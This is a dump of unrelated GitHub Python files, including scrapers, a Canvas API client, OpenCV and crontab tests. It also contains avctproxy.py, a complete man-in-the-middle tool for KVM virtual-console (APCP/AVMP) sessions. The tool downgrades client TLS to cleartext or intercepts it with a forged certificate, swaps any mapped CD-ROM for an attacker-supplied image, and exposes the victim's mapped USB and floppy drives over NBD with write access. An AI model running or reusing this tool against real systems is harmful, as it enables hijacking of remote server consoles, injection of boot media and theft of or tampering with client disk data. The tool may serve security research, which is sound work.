y)\nax.plot(range(1, 1 + len(ada1.cost)), np.log10(ada1.cost), marker = 'o')\nax.set_xlabel(\"Epoch\")\nax.set_ylabel(\"log(Sum-squared-error)\")\nax.set_title('Adaline - Learning rate 0.001')\n\nplt.show()","repo_name":"TheOneAC/ML","sub_path":"sklearn/AdaLineSGD.py","file_name":"AdaLineSGD.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74464365672","text":"\"\"\"\nThis module represents the Consumer.\n\nComputer Systems Architecture Course\nAssignment 1\nMarch 2021\n\"\"\"\n\nfrom threading import Thread, currentThread\nimport time\n\nclass Consumer(Thread):\n    \"\"\"\n    Class that represents a consumer.\n    \"\"\"\n\n    def __init__(self, carts, marketplace, retry_wait_time, **kwargs):\n        \"\"\"\n        Constructor.\n\n        :type carts: List\n        :param carts: a list of add and remove operations\n\n        :type marketplace: Marketplace\n        :param marketplace: a reference to the marketplace\n\n        :type retry_wait_time: Time\n        :param retry_wait_time: the number of seconds that a producer must wait\n        until the Marketplace becomes available\n\n        :type kwargs:\n        :param kwargs: other arguments that are passed to the Thread's __init__()\n        \"\"\"\n\n        Thread.__init__(self, **kwargs)\n        self.carts = carts\n        self.marketplace = marketplace\n        self.retry_wait_time = retry_wait_time\n\n    def run(self):\n        for cart in self.carts:\n            id_cart = self.marketplace.new_cart()\n            for operation in cart:\n                op_count = 0\n                while op_count < operation['quantity']:\n                    if operation['type'] == 'add':\n                        if self.marketplace.add_to_cart(id_cart, operation['product']) is False:\n                            time.sleep(self.retry_wait_time) # retry until all the operations succeed\n                        else:\n                            op_count += 1\n                    elif 
operation['type'] == 'remove':\n self.marketplace.remove_from_cart(id_cart, operation['product'])\n op_count += 1\n\n products_in_cart = self.marketplace.place_order(id_cart)\n for product in products_in_cart: #afiseaza produsele din cart\n print(currentThread().getName() + \" bought \" + str(product))\n","repo_name":"Andrei-Mocanu/Tema1ASC","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13773557799","text":"import awscli\r\nimport datetime\r\nimport boto3\r\nimport requests\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\n\r\ns3 = boto3.resource('s3')\r\n##파일 업로드 \r\n# data = open('13_AsynchronousSiteTest_1.json','rb')\r\n# s3.Bucket('zoomstudy').put_object(Key = 'python/13_AsynchronousSiteTest_2.json', Body = data )\r\n\r\n##파일 다운로드\r\n# s3.Bucket('zoomstudy').download_file('13_AsynchronousSiteTest_1.json','13_newsCrawling.json')\r\n\r\n##test ) 일주일 뉴스 타이틀과 요약내용 크롤링 해서 날짜별로 파일을 만들어 s3스토리지에 저장하기\r\n\r\n\r\nheaders = {\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"\r\n}\r\n\r\n\r\ndate = datetime.datetime.strptime('20230114','%Y%m%d')\r\n\r\nfor i in range(7):\r\n date_str = date.strftime('%Y%m%d')\r\n page = 1\r\n\r\n news = []\r\n\r\n while True:\r\n \r\n\r\n print(date_str, page)\r\n \r\n \r\n url = f'https://news.naver.com/main/list.naver?mode=LPOD&mid=sec&oid=003&date={date_str}&page={page}'\r\n\r\n\r\n \r\n response = requests.get(url,headers=headers)\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n if str(page) != soup.select_one('div.paging strong').text.strip():\r\n break\r\n\r\n\r\n for news_data in soup.select('ul.type06 li') :\r\n news.append({\r\n 'title':news_data.select('a')[-1].text.strip(),\r\n 'body':news_data.select_one('span.lede').text.strip()\r\n })\r\n \r\n page += 1\r\n \r\n \r\n\r\n s3.Bucket('zoomstudy').put_object(Key = f'news/{date_str}.json',Body = json.dumps(news, ensure_ascii= False))\r\n \r\n date = date - datetime.timedelta(days=1)","repo_name":"zoom236/Web_Crawling","sub_path":"[Review]15_S3Crawling.py","file_name":"[Review]15_S3Crawling.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9293306399","text":"#!/usr/bin/python\n\nfrom twisted.internet import protocol, ssl, reactor, endpoints, defer\nfrom twisted.python import log\nfrom OpenSSL import SSL\nfrom zope.interface import implements\n\nimport os\n\nfrom utils import hexdump, RODict\nfrom avctproto import AvctProtocol\nimport avctpacket\nimport nbdserver\n\n\nclass AvctProxy(AvctProtocol):\n\t\"\"\"A base class for proxying APCP/AVMP messages\"\"\"\n\n\t# OVERRIDE interceptMessages, don't modify!\n\tinterceptMessages = RODict()\n\n\tready = False\n\n\tdef messageReceived(self, packet):\n\t\thandler = self.interceptMessages.get(\n\t\t\t(packet.proto, packet.messageType),\n\t\t\tdebugProxy\n\t\t)\n\t\thandler(self, packet)\n\n\tdef connectionLost(self, reason):\n\t\tlog.msg(\"%s: connection lost (%s). 
Disconnecting peer.\" % (\n\t\t\tself.logPrefix(), str(reason)\n\t\t))\n\t\tif self.peer.transport is not None:\n\t\t\tself.peer.transport.loseConnection()\n\t\t# Clear possible circular refs\n\t\tself.peer = None\n\t\tself.factory = None\n\n\tdef logPrefix(self):\n\t\tif isinstance(self.factory, AvctProxyServerFactory):\n\t\t\treturn \"AVCTProxyServer\"\n\t\telif isinstance(self.factory, AvctProxyClientFactory):\n\t\t\treturn \"AVCTProxyClient\"\n\t\telse:\n\t\t\treturn \"AvctProxyUnknownRole\"\n\n\tdef passthroughData(self, data):\n\t\tlog.msg(\"[passthrough]:\\n\" + hexdump(data))\n\t\tself.peer.transport.write(data)\n\n\ndef silentProxy(p, packet):\n\tp.peer.sendMessage(packet)\n\n\ndef debugProxy(p, packet):\n\tif packet.proto in ('APCP', 'AVMP'):\n\t\tlog.msg(\"Proxying \" + packet.display())\n\tp.peer.sendMessage(packet)\n\n\nclass AvctProxyServerFactory(protocol.Factory):\n\tprotocol = AvctProxy\n\n\tdef __init__(self, clientFactory, clientEndpoint, sessionJacker, driveJacker):\n\t\tself.clientFactory = clientFactory\n\t\tself.clientEndpoint = clientEndpoint\n\t\tself.sessionJacker = sessionJacker\n\t\tself.driveJacker = driveJacker\n\t\tself.sessionNumber = 0\n\n\tdef buildProtocol(self, addr):\n\t\tp = self.protocol()\n\t\tp.factory = self\n\t\tp.sessionNumber = self.sessionNumber\n\t\tself.sessionNumber += 1\n\t\td = self.clientEndpoint.connect(self.clientFactory)\n\t\td.addCallback(self.clientConnected, p)\n\t\td.addErrback(self.clientConnectFailed, p)\n\t\treturn p\n\n\tdef clientConnected(self, clientp, p):\n\t\tlog.msg(\"Connected to KVM server\")\n\t\tp.peer = clientp\n\t\tclientp.peer = p\n\t\tp.ready = True\n\t\tclientp.ready = True\n\t\tclientp.sessionNumber = p.sessionNumber\n\n\t\tp.interceptMessages = {\n\t\t\t(\"AVMP\", 0x0210): self.driveJacker.mapCD,\n\t\t\t(\"AVMP\", 0x0211): self.driveJacker.mapDisk,\n\t\t\t(\"AVMP\", 0x0220): self.driveJacker.unmapDrive,\n\t\t\t(\"AVMP\", 0x0300): self.driveJacker.readResponse,\n\t\t\t(\"AVMP\", 0x0400): silentProxy,\n\t\t\t(\"AVMP\", 0x0410): self.driveJacker.clientStatus,\n\t\t}\n\n\t\tclientp.interceptMessages = {\n\t\t\t(\"APCP\", 0x8100): self.sessionJacker.sessionSetup,\n\t\t\t(\"AVMP\", 0x8200): self.driveJacker.diskInfo,\n\t\t\t(\"AVMP\", 0x8300): self.driveJacker.readRequest,\n\t\t}\n\n\t\t# Flush the buffer\n\t\tp.dataReceived('')\n\t\tclientp.dataReceived('')\n\n\tdef clientConnectFailed(self, reason, p):\n\t\tlog.err(reason)\n\t\tp.transport.loseConnection()\n\n\nclass AvctProxyClientFactory(protocol.Factory):\n\tprotocol = AvctProxy\n\n\nclass ClientCtxFactory(ssl.ClientContextFactory):\n\tmethod = SSL.TLSv1_METHOD\n\n\tdef __init__(self, trustedCerts):\n\t\tself.trustedCerts = trustedCerts\n\n\tdef getContext(self):\n\t\tctx = ssl.ClientContextFactory.getContext(self)\n\t\tif self.trustedCerts is not None:\n\t\t\tctx.load_verify_locations(self.trustedCerts)\n\t\treturn ctx\n\n\ndef ServerCtxFactory(serverkey, servercert):\n\tif serverkey is None and servercert is None:\n\t\tlog.msg(\"Server key and/or server cert not supplied. 
TLS MiTM disabled\")\n\t\treturn None\n\treturn ssl.DefaultOpenSSLContextFactory(\n\t\tserverkey, servercert,\n\t\tsslmethod=SSL.TLSv1_METHOD)\n\n\nclass SessionJacker(object):\n\tdef __init__(self, trustedcerts, serverkey, servercert, attemptDowngrade):\n\t\tself.clientCtxFactory = ClientCtxFactory(trustedcerts)\n\t\tself.serverCtxFactory = ServerCtxFactory(serverkey, servercert)\n\t\tself.attemptDowngrade = attemptDowngrade\n\n\tdef sessionSetup(self, p, packet):\n\t\tlog.msg(\"Received \" + packet.display())\n\t\tif packet.capabilities == 4: # 4 == TLS\n\t\t\tif self.attemptDowngrade:\n\t\t\t\tlog.msg(\"TLS Client downgrade initiated\")\n\t\t\t\tp.transport.startTLS(self.clientCtxFactory)\n\t\t\t\tpacket.capabilities = 1\n\t\t\t\tp.peer.sendMessage(packet)\n\t\t\telif self.serverCtxFactory is not None:\n\t\t\t\tlog.msg(\"TLS MiTM initiated\")\n\t\t\t\tp.transport.startTLS(self.clientCtxFactory)\n\t\t\t\tp.peer.sendMessage(packet)\n\t\t\t\tp.peer.transport.startTLS(self.serverCtxFactory)\n\t\t\telse:\n\t\t\t\tlog.msg(\"TLS passthrough initiated\")\n\t\t\t\tp.peer.sendMessage(packet)\n\t\t\t\tp.enterPassthrough()\n\t\t\t\tp.peer.enterPassthrough()\n\t\telse:\n\t\t\tlog.msg(\"Cleartext session in progress\")\n\t\t\tp.peer.sendMessage(packet)\n\n\ndef _nbdReady(_):\n\tlog.msg(\"NBD Server ready for connections\")\n\n\ndef _nbdListenFailed(reason):\n\tlog.err(reason)\n\n\ndef nbdexportname(p, driveIndex):\n\treturn \"S%dD%d\" % (p.sessionNumber, driveIndex)\n\n\nclass DriveJacker(object):\n\tdef __init__(self, cdromfp, doNbd, nbdEndpoint):\n\t\tself.cdromfp = cdromfp\n\t\tself.cdromIndices = set()\n\t\tself.nbdExports = {}\n\t\tself.doNbd = doNbd\n\t\tself.cachedDiskInfo = None\n\n\t\tif doNbd:\n\t\t\tf = nbdserver.NBDServerFactory(self.nbdExports)\n\t\t\td = nbdEndpoint.listen(f)\n\t\t\td.addCallback(_nbdReady)\n\t\t\td.addErrback(_nbdListenFailed)\n\n\t# CDROM Jacking\n\tdef mapCD(self, p, packet):\n\t\tif self.cdromfp is None:\n\t\t\tlog.msg(\"CD Jack disabled, proxying \" + packet.display())\n\t\telse:\n\t\t\tlog.msg(\"Original request: \" + packet.display())\n\t\t\ts = os.fstat(self.cdromfp.fileno())\n\t\t\tpacket.numblocks = s.st_size // 2048\n\t\t\tpacket.blocksize = 2048\n\t\t\tlog.msg(\"Modified request: \" + packet.display())\n\t\t\tself.cdromIndices.add(packet.driveIndex)\n\t\t\tlog.msg(\"Jacked CD mapping\")\n\t\tp.peer.sendMessage(packet)\n\n\tdef unmapDrive(self, p, packet):\n\t\texportname = nbdexportname(p, packet.driveIndex)\n\t\tif packet.driveIndex in self.cdromIndices:\n\t\t\tlog.msg(\"Unjacked drive\")\n\t\t\tself.cdromIndices.remove(packet.driveIndex)\n\t\t\tp.peer.sendMessage(packet)\n\t\telif exportname in self.nbdExports:\n\t\t\tself.nbdExports[exportname].size = 0\n\t\t\tdel self.nbdExports[exportname]\n\t\t\tif self.cachedDiskInfo is not None:\n\t\t\t\tself.cachedDiskInfo.items[packet.driveIndex].status = 0\n\t\t\t\tlog.msg(\"Sending cached \" + self.cachedDiskInfo.display())\n\t\t\t\tp.sendMessage(self.cachedDiskInfo)\n\t\t\tstatus = avctpacket.ClientStatus(packet.driveIndex, 0)\n\t\t\tlog.msg(\"Sending our own \" + status.display())\n\t\t\tp.sendMessage(status)\n\t\telse:\n\t\t\tdebugProxy(p, packet)\n\n\tdef readRequest(self, p, packet):\n\t\tlog.msg(\"Received \" + packet.display())\n\n\t\tif packet.driveIndex not in self.cdromIndices:\n\t\t\tp.peer.sendMessage(packet)\n\t\t\treturn\n\n\t\toffset = packet.firstBlock\n\t\tnumBlocks = packet.numBlocks\n\t\twhile numBlocks > 0:\n\t\t\ti = min(numBlocks, packet.blockFactor)\n\t\t\tself.cdromfp.seek(offset * 
2048)\n\t\t\tdata = self.cdromfp.read(i * 2048)\n\t\t\tresponse = avctpacket.ReadResponse(\n\t\t\t\tpacket.driveIndex,\n\t\t\t\toffset, i, data\n\t\t\t)\n\t\t\tlog.msg(\"Sending our own \" + response.display())\n\t\t\tp.sendMessage(response)\n\t\t\toffset += i\n\t\t\tnumBlocks -= i\n\t\tstatus = avctpacket.ClientStatus(packet.driveIndex, 0)\n\t\tlog.msg(\"Sending our own \" + status.display())\n\t\tp.sendMessage(status)\n\n\n\t# USB/Floppy Jacking\n\tdef mapDisk(self, p, packet):\n\t\tif not self.doNbd:\n\t\t\treturn debugProxy(p, packet)\n\t\texportName = nbdexportname(p, packet.driveIndex)\n\t\tself.nbdExports[exportName] = NBDExport(p, packet)\n\t\tlog.msg(\"Exported drive as \" + exportName)\n\n\t\tif self.cachedDiskInfo is not None:\n\t\t\tself.cachedDiskInfo.items[packet.driveIndex].status = 1\n\t\t\tlog.msg(\"Sending cached \" + self.cachedDiskInfo.display())\n\t\t\tp.sendMessage(self.cachedDiskInfo)\n\n\t\tstatus = avctpacket.DeviceStatus(packet.driveIndex, 0)\n\t\tlog.msg(\"Sending \" + status.display())\n\t\tp.sendMessage(status)\n\n\tdef readResponse(self, p, packet):\n\t\texportName = nbdexportname(p, packet.driveIndex)\n\t\tif exportName not in self.nbdExports:\n\t\t\treturn debugProxy(p, packet)\n\t\tself.nbdExports[exportName].processReadResponse(packet)\n\n\tdef clientStatus(self, p, packet):\n\t\texportName = nbdexportname(p, packet.driveIndex)\n\t\tif exportName not in self.nbdExports:\n\t\t\treturn debugProxy(p, packet)\n\t\tself.nbdExports[exportName].processClientStatus(packet)\n\n\tdef diskInfo(self, p, packet):\n\t\tfor i in range(len(packet.items)):\n\t\t\texportName = nbdexportname(p, i)\n\t\t\tif exportName in self.nbdExports:\n\t\t\t\tpacket.items[i].status = 1\n\t\tself.cachedDiskInfo = packet\n\t\tdebugProxy(p, packet)\n\n\nclass NBDExport(object):\n\timplements(nbdserver.IBlockDevice)\n\n\tdef __init__(self, proto, packet):\n\t\tself.proto = proto\n\t\tself.driveIndex = packet.driveIndex\n\t\tself.blocksize = packet.blocksize\n\t\tself.size = self.blocksize * packet.numblocks\n\t\tself.flags = 1\n\t\tif packet.readonly:\n\t\t\tself.flags |= 2\n\n\t\tself.requestQueue = [] # AVMP is synchronous only.\n\t\tself.request = None\n\t\tself.defer = None\n\t\tself.readbuf = ''\n\n\tdef processQueue(self):\n\t\tif self.request is not None or len(self.requestQueue) == 0:\n\t\t\treturn\n\t\t(self.request, self.defer) = self.requestQueue.pop(0)\n\t\tself.proto.sendMessage(self.request)\n\n\tdef read(self, offset, length):\n\t\tif offset % self.blocksize != 0:\n\t\t\traise IOError(\"Requests must be block-aligned\")\n\t\tif length % self.blocksize != 0:\n\t\t\traise IOError(\"Requests must be block-sized\")\n\t\tif offset + length > self.size:\n\t\t\traise IOError(\"Attempt to read beyond end of device\")\n\n\t\tpacket = avctpacket.ReadRequest(\n\t\t\tself.driveIndex,\n\t\t\toffset // self.blocksize,\n\t\t\tlength // self.blocksize,\n\t\t\t16384 // self.blocksize\n\t\t)\n\t\td = defer.Deferred()\n\t\tself.requestQueue.append((packet, d))\n\t\tself.processQueue()\n\t\treturn d\n\n\tdef write(self, offset, data):\n\t\tif offset % self.blocksize != 0:\n\t\t\traise ValueError(\"Requests must be block-aligned\")\n\t\tif len(data) % self.blocksize != 0:\n\t\t\traise ValueError(\"Requests must be block-sized\")\n\t\tpacket = avctpacket.WriteRequest(\n\t\t\tself.driveIndex,\n\t\t\toffset // self.blocksize,\n\t\t\tlen(data) // self.blocksize,\n\t\t\tdata\n\t\t)\n\t\td = defer.Deferred()\n\t\tself.requestQueue.append((packet, d))\n\t\tself.processQueue()\n\t\treturn d\n\n\tdef 
processReadResponse(self, packet):\n\t\tself.readbuf += packet.data\n\n\tdef processClientStatus(self, packet):\n\t\tif self.defer is None:\n\t\t\traise ValueError(\"Received unsolicited \" + packet.display())\n\n\t\tif isinstance(self.request, avctpacket.ReadRequest):\n\t\t\tself.defer.callback(self.readbuf)\n\t\t\tself.readbuf = ''\n\t\telse:\n\t\t\tself.defer.callback(None)\n\t\tself.request = None\n\t\tself.defer = None\n\t\tself.processQueue()\n\n\ndef main():\n\timport sys\n\timport argparse\n\n\tdef serverType(x):\n\t\tif isinstance(x, str):\n\t\t\treturn endpoints.serverFromString(reactor, x)\n\t\telse:\n\t\t\treturn x\n\n\tdef clientType(x):\n\t\tif isinstance(x, str):\n\t\t\treturn endpoints.clientFromString(reactor, x)\n\t\telse:\n\t\t\treturn x\n\n\tdef serverListening(listeningPort):\n\t\tlog.msg(\"AvctProxy listening on \" + str(listeningPort.getHost()))\n\n\tdef serverListenFailed(reason):\n\t\tif hasattr(reason, 'socketError'):\n\t\t\tlog.err(reason.socketError)\n\t\telse:\n\t\t\tlog.err(reason)\n\t\treactor.stop()\n\n\tparser = argparse.ArgumentParser(description='APCP/AVMP MITM tool')\n\tparser.add_argument(\n\t\t'--listen', help='Listen address/port in Twisted endpoint syntax',\n\t\ttype=serverType, default='tcp:2068')\n\tparser.add_argument(\n\t\t'--target', help='Address of target server (Twisted endpoint syntax)',\n\t\ttype=clientType, required=True)\n\tparser.add_argument(\n\t\t'--trustedcerts',\n\t\thelp='File with trusted TLS certificate(s) - to prevent MiTM of us',\n\t\tdefault=None)\n\tparser.add_argument(\n\t\t'--servercert', help='File containing the server certificate for MiTM',\n\t\tdefault=None)\n\tparser.add_argument(\n\t\t'--serverkey', help='File containing the server private key for MiTM',\n\t\tdefault=None)\n\tparser.add_argument(\n\t\t'--downgrade', help='Attempt to downgrade client connections to cleartext',\n\t\taction='store_true')\n\tparser.add_argument(\n\t\t'--debug', help='Print verbose logs to stderr',\n\t\taction='store_true')\n\tparser.add_argument(\n\t\t'--nbd', help='Export disks and floppies as an NBD device',\n\t\taction='store_true')\n\tparser.add_argument(\n\t\t'--nbdlisten', type=serverType, default='tcp:10809:interface=127.0.0.1',\n\t\thelp='Listen address/port for NBD in Twisted endpoint syntax')\n\tparser.add_argument(\n\t\t'--cdrom', help='Replace any mapped cdrom with the provided file',\n\t\ttype=argparse.FileType(mode='rb'), default=None)\n\targs = parser.parse_args()\n\n\tif args.debug:\n\t\tlog.startLogging(sys.stderr)\n\n\tsessionJacker = SessionJacker(\n\t\targs.trustedcerts, args.serverkey,\n\t\targs.servercert, args.downgrade)\n\n\tdriveJacker = DriveJacker(args.cdrom, args.nbd, args.nbdlisten)\n\n\tclientFactory = AvctProxyClientFactory()\n\tserverFactory = AvctProxyServerFactory(\n\t\tclientFactory, args.target, sessionJacker, driveJacker\n\t)\n\n\td = args.listen.listen(serverFactory)\n\td.addCallback(serverListening)\n\td.addErrback(serverListenFailed)\n\n\treactor.run()\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"therealmik/avctproxy","sub_path":"avctproxy.py","file_name":"avctproxy.py","file_ext":"py","file_size_in_byte":12670,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
{"seq_id":"16883477644","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef get_max_area_contour(contour_list):\n \"\"\"\n Given a list of contours, finds the contour with the maximum area and\n returns it together with that area\n \"\"\"\n contour_areas = np.array([cv2.contourArea(c) for c in contour_list])\n max_area = contour_areas.max()\n max_ind = contour_areas.argmax()\n max_contour = contour_list[max_ind]\n return max_contour, max_area\n\ndef order_by_area(contour_list):\n \"\"\"\n Given a list of contours, returns them reordered by area,\n largest first\n \"\"\"\n contour_areas = np.array([cv2.contourArea(c) for c in contour_list])\n indices = list(reversed(np.argsort(contour_areas)))\n reordered_list = [contour_list[index] for index in indices]\n return reordered_list\n\nfps = 30.\ntime_per_frame = int(np.ceil(1000./fps))\n\ndef show_image(img,size=800):\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('image', size, size)\n cv2.imshow('image',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef show_frame(img,size=800,time_per_frame=time_per_frame):\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('image', size,size)\n cv2.imshow('image',img)\n cv2.waitKey(time_per_frame)\n cv2.destroyAllWindows()\n\nthreshold = 70\n\nvidcap = cv2.VideoCapture('NPF_2.avi')\nsuccess,image = vidcap.read()\n\n# plt.ion()\n# plt.figure()\nshow_frame(image)\n\n# while success:\n# success,image = vidcap.read()\n# show_image(image)\n\nwhile success:\n success,image = vidcap.read()\n image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n # rval, threshold_image = cv2.threshold(image, threshold, np.iinfo(image.dtype).max, cv2.THRESH_BINARY_INV)\n threshold_image = cv2.adaptiveThreshold(image, np.iinfo(image.dtype).max,\\\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,251,2)\n contour_list, _ = cv2.findContours(threshold_image, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_NONE)\n max_contour, max_area = get_max_area_contour(contour_list)\n contour_list = order_by_area(contour_list)\n contour_image = cv2.cvtColor(image,cv2.COLOR_GRAY2BGR)\n cv2.drawContours(contour_image,contour_list[0],-1,(0,0,255),2)\n # cv2.drawContours(contour_image,contour_list[1:3],-1,(0,0,255),2)\n # display = contour_image\n # plt.draw()\n show_image(contour_image)\n","repo_name":"annierak/PER_mv","sub_path":"edge_detect_video.py","file_name":"edge_detect_video.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"72057811752","text":"\"\"\"Valid Anagram\"\"\"\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n d1, d2 = {}, {}\n for i in s:\n d1[i] = d1.get(i, 0) + 1\n for i in t:\n d2[i] = d2.get(i, 0) + 1\n return d1 == d2\n\n\nif __name__ == \"__main__\":\n s = Solution()\n res = s.isAnagram(\"rat\", \"car\")\n print(res)\n","repo_name":"BrightHao/arithmetic","sub_path":"leetcode/242/isAnagram.py","file_name":"isAnagram.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"37409761971","text":"import requests\nimport time\nfrom datetime import datetime\nimport pytz\n\n#oauth2 workflow\n#GET https:///login/oauth2/auth?client_id=XXX&response_type=code&redirect_uri=https://example.com/oauth_complete&state=YYY&scope=%20%20\n# request = requests.get(\"https://canvas.ucsc.edu/login/oauth2/auth?client_id=%s&response_type=code&redirect_uri=https://canvas.ucsc.edu\", os.getenv('CLIENT_ID'))\n# print(request.json())\n\n#curl -H \"Authorization: Bearer \" \"https://canvas.instructure.com/api/v1/courses\"\n\nclass Canvas:\n def __init__(self, access_token):\n self.access_token = access_token\n self.base_url = \"https://canvas.instructure.com/api/v1/\"\n 
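# default request headers: every Canvas call below authenticates with the same static bearer token\n 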
self.headers = {\n \"Authorization\": \"Bearer \" + self.access_token,\n \"Content-Type\": \"application/json\"\n }\n def get_courses(self):\n url = self.base_url + \"courses\"\n response = requests.get(url, headers=self.headers)\n return response.json()\n\n def get_assignments(self):\n return_string = \"\"\n courses = self.get_courses()\n for course in courses:\n url = self.base_url + \"courses/\" + str(course[\"id\"]) + \"/assignments\"\n assignments = requests.get(url, headers=self.headers).json()\n return_string = return_string + \"Course: \" + course[\"name\"] + \"\\n\"\n for assignment in assignments:\n if assignment[\"due_at\"] != None:\n assignment_due_date = datetime.strptime(assignment[\"due_at\"], \"%Y-%m-%dT%H:%M:%SZ\")\n if assignment_due_date.date() > datetime.now().date():\n pst = pytz.timezone(\"US/Pacific\")\n date_time = pytz.timezone('UTC').localize(assignment_due_date)\n date_time = date_time.astimezone(pst)\n date_time = date_time.strftime(\"%m/%d/%Y %H:%M\")\n result = \"Assignment: %s\\nDue: %s\" %(assignment[\"name\"], date_time)\n return_string = return_string + result\n return return_string\n\n","repo_name":"benjichen16/Canvas_Discord_Bot","sub_path":"canvas_api.py","file_name":"canvas_api.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73456191593","text":"import os\nimport logging\nimport articales.constants as const\nfrom selenium import webdriver\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions as EC\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.INFO)\n\n\nclass Articles(webdriver.Chrome):\n\n def __init__(self, driver_path=r\"./chromedriver\"):\n self.driver_path = driver_path\n os.environ['PATH'] += self.driver_path\n super(Articles, self).__init__()\n self.implicitly_wait(15)\n self.maximize_window()\n self.save_dir = const.SAVE_DIR_BBC_ARTOCALES\n self.article_link_list = []\n\n if not os.path.isdir(rf'../{self.save_dir}'):\n os.makedirs(rf'../{self.save_dir}')\n\n def __exit__(self, exc_type, exc_value, trace):\n self.quit()\n\n def land_first_page(self):\n self.get(const.BASE_URL)\n\n def get_all_articales_link(self):\n try:\n articles_link_list = WebDriverWait(self, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, \"//*[starts-with(@class, 'media__link')]\"))\n )\n except:\n raise\n\n for item in articles_link_list:\n self.article_link_list.append(str(item.get_attribute('href')))\n\n def extract_articles_and_save(self):\n if self.article_link_list:\n total_article_num = len(self.article_link_list)\n for index, link in enumerate(self.article_link_list):\n self.get(link)\n try:\n article_title = self.find_element(By.ID, 'main-heading').get_attribute('innerHTML').strip()\n except:\n article_title = \"\"\n\n if link.startswith(const.BASE_URL):\n filename = str(link).split(const.BASE_URL)[1].replace('/', '_')\n else:\n filename = str(link).split('/')[-1]\n\n if not os.path.isfile(rf\"../{self.save_dir}/{filename}.txt\"):\n text = WebDriverWait(self, 20).until(\n EC.presence_of_all_elements_located((By.TAG_NAME, 'p'))\n )\n content = \" \".join([i.text for i in text])\n logging.info(f\"--> saving --> {index+1}/{total_article_num}\")\n with 
open(rf\"../{self.save_dir}/{filename}.txt\", \"w\") as outfile:\n outfile.write(f\"link: {link}\\n title: {article_title}\\n{content}\")\n else:\n continue\n\n","repo_name":"Avichai96/SeleniumExample","sub_path":"articales/articales.py","file_name":"articales.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8374679471","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport gevent\n\nfrom datetime import datetime, timedelta\nfrom pytz import timezone\n\nimport pytest\n\nfrom prewikka.crontab import CronJob, crontab\n\n\ndef cronjob_test_func():\n \"\"\"\n Function for tests only.\n \"\"\"\n return 42\n\n\ndef cronjob_test_func_exception():\n \"\"\"\n Function for tests only.\n \"\"\"\n raise Exception\n\n\ndef test_crontab():\n \"\"\"\n Test `prewikka.crontab.Crontab` class.\n \"\"\"\n cron_name = 'test_name'\n cron_schedule = '*/1 * * * *'\n\n # list()\n crontab_count = len(list(crontab.list()))\n\n assert crontab_count == 3\n\n # add()\n crontab.add(cron_name, cron_schedule, user=env.request.user, ext_type=None, ext_id=None, enabled=True)\n\n assert len(list(crontab.list())) == crontab_count + 1\n\n test_crontab = next(crontab.list())\n\n # get()\n assert crontab.get(test_crontab.id).id == test_crontab.id\n\n # update()\n crontab.update(test_crontab.id, schedule='*/2 * * * *')\n\n assert len(list(crontab.list())) == crontab_count + 1\n assert crontab.get(test_crontab.id).id == test_crontab.id\n assert crontab.get(test_crontab.id).schedule == '*/2 * * * *'\n\n assert len(list(crontab.list())) == crontab_count + 1\n\n # delete()\n assert len(list(crontab.list())) == crontab_count + 1\n\n crontab.delete(**{'id': test_crontab.id})\n\n assert len(list(crontab.list())) == crontab_count\n\n crontab.delete(**{'id': test_crontab.id})\n\n assert len(list(crontab.list())) == crontab_count\n\n crontab.add(cron_name+'2', cron_schedule, user=env.request.user, ext_type='foo')\n crontab.add(cron_name+'3', cron_schedule, user=env.request.user, ext_type='foo', ext_id=1)\n crontab.add(cron_name+'4', cron_schedule, user=env.request.user, enabled=False)\n\n # clean\n env.db.query('DELETE FROM Prewikka_Crontab')\n\n\ndef test_cronjob():\n \"\"\"\n Test `prewikka.crontab.CronJob` class.\n \"\"\"\n now = datetime.now(timezone(\"UTC\"))\n\n cron_name = 'test_name'\n cron_schedule = '* * * * *'\n cron_base = now.replace(second=0, microsecond=0)\n cron_runcnt = 0\n\n # create a crontab for tests\n cron_id = crontab.add(cron_name, cron_schedule, user=env.request.user, ext_type=None, ext_id=None, enabled=True)\n\n cronjob = CronJob(cron_id,\n cron_name,\n cron_schedule,\n cronjob_test_func,\n cron_base - timedelta(minutes=33),\n cron_runcnt,\n user=env.request.user)\n\n # replace() needed for croniter < 0.3.8\n assert now - timedelta(minutes=1) < 